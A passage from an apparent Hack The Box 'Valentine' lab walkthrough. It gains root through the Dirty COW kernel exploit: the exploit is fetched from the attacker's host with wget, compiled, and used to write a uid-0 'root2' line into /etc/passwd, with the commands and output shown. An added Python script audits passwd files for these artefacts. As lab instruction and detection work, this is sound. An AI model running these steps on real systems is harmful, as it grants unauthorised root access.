man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh

And su as firefart

hype@Valentine:~$ su - firefart
Password:
firefart@Valentine:~# whoami
firefart
firefart@Valentine:~# id
uid=0(firefart) gid=0(root) groups=0(root)

User escalation (CVE-2016-5195 Manual way)

Alternative way to escalate privileges, but this time manually.

Search exploit

root@kali:~/HTB/Machines/Valentine# searchsploit -m 40838
  Exploit: Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (Write Access Method)
     URL: https://www.exploit-db.com/exploits/40838
    Path: /usr/share/exploitdb/exploits/linux/local/40838.c
File Type: C source, ASCII text, with CRLF line terminators

Copied to: /root/HTB/Machines/Valentine/40838.c

Upload and compile the exploit

hype@Valentine:~$ wget -q http://10.10.14.34/40838.c
hype@Valentine:~$ gcc -pthread 40838.c -o dirty -lcrypt

Run the exploit

hype@Valentine:~$ openssl passwd -crypt
Password:
Verifying - Password:
2KsQeC85CMFbA
hype@Valentine:~$ ./dirty /etc/passwd "root2:2KsQeC85CMFbA:0:0:root:/root:/bin/bash"
/etc/passwd
  (___)
  (o o)_____/
   @@ `     \
    \ ____, /root2:2KsQeC85CMFbA:0:0:root:/root:/bin/bash                      
    //    //
   ^^    ^^
mmap 7f2d83f1e000

madvise 0
ptrace 0

Gain access

The result is not very clean (the overwritten bytes spill into the next entry), but our line has been added:

hype@Valentine:~$ head /etc/passwd
root2:2KsQeC85CMFbA:0:0:root:/root:/bin/bashTERM=x:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh

And su as root2

hype@Valentine:~$ su - root2
Password:
root2@Valentine:~# whoami
root2
root2@Valentine:~# id
uid=0(root2) gid=0(root) groups=0(root)
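Both Dirty COW runs above leave the same kind of trace in /etc/passwd: a second uid-0 account, a DES crypt hash stored in the password field instead of in /etc/shadow, the original root entry overwritten, and a mangled neighbouring line. The script below is an added example, not part of the original write-up or of the exploit: it parses passwd-format text the way getpwent() does (the seventh field runs to end of line) and reports each of those anomalies. The sample inputs are constructed from the head /etc/passwd output shown in the two sections above.

```python
"""Audit /etc/passwd for the artefacts left by the two Dirty COW runs above.

Added example, not part of the original write-up. Reports:
  * uid-0 accounts other than root (firefart, root2),
  * a hash stored directly in passwd rather than 'x' (deferred to /etc/shadow),
  * lines with fewer than seven fields, or a shell field containing ':'
    (the overwritten bytes spill into the next entry, as with root2),
  * the real root entry being gone (the first line was overwritten).
"""
from dataclasses import dataclass, field
from typing import List, Tuple


@dataclass
class PasswdReport:
    extra_root_accounts: List[str] = field(default_factory=list)
    hash_in_passwd: List[str] = field(default_factory=list)
    malformed_lines: List[Tuple[int, str]] = field(default_factory=list)
    root_missing: bool = True

    def is_clean(self) -> bool:
        return not (self.extra_root_accounts or self.hash_in_passwd
                    or self.malformed_lines or self.root_missing)


def audit_passwd(text: str) -> PasswdReport:
    """Parse passwd-format text and flag the anomalies listed above."""
    report = PasswdReport()
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        # At most 7 fields: like getpwent(), the shell keeps any extra ':'.
        fields = line.split(":", 6)
        if len(fields) != 7:
            report.malformed_lines.append((lineno, line))
            continue
        name, pw, uid, gid, _gecos, _home, shell = fields
        if ":" in shell or not uid.isdigit() or not gid.isdigit():
            report.malformed_lines.append((lineno, line))
        if name == "root":
            report.root_missing = False
        elif uid == "0":
            report.extra_root_accounts.append(name)
        # 'x' defers to /etc/shadow; '*', '!' and '!!' lock the account.
        # Anything else is a hash kept in the world-readable passwd file.
        if pw not in ("x", "*", "!", "!!", ""):
            report.hash_in_passwd.append(name)
    return report


# Constructed from the head /etc/passwd output after running 40839.c.
PASSWD_AFTER_40839 = """\
firefart:fi5FgEvdhZiPQ:0:0:pwned:/root:/bin/bash
/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
"""

# Constructed from the head /etc/passwd output after running 40838.c.
PASSWD_AFTER_40838 = """\
root2:2KsQeC85CMFbA:0:0:root:/root:/bin/bashTERM=x:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
"""

# Constructed healthy baseline for comparison.
PASSWD_CLEAN = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
"""

if __name__ == "__main__":
    for label, sample in (("after 40839", PASSWD_AFTER_40839),
                          ("after 40838", PASSWD_AFTER_40838),
                          ("clean", PASSWD_CLEAN)):
        r = audit_passwd(sample)
        print(label, "-> clean" if r.is_clean() else f"-> {r}")
```

Pointing `audit_passwd` at the live file (`open("/etc/passwd").read()`) gives the same checks on a real host, and comparing against a known-good copy such as the /tmp/passwd.bak the exploit leaves behind shows exactly which lines changed.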

Root Flag

root@Valentine:/tmp# cat /root/root.txt
<ROOT_FLAG>

References

Daniel Simao 14:03, 28 November 2019 (EST)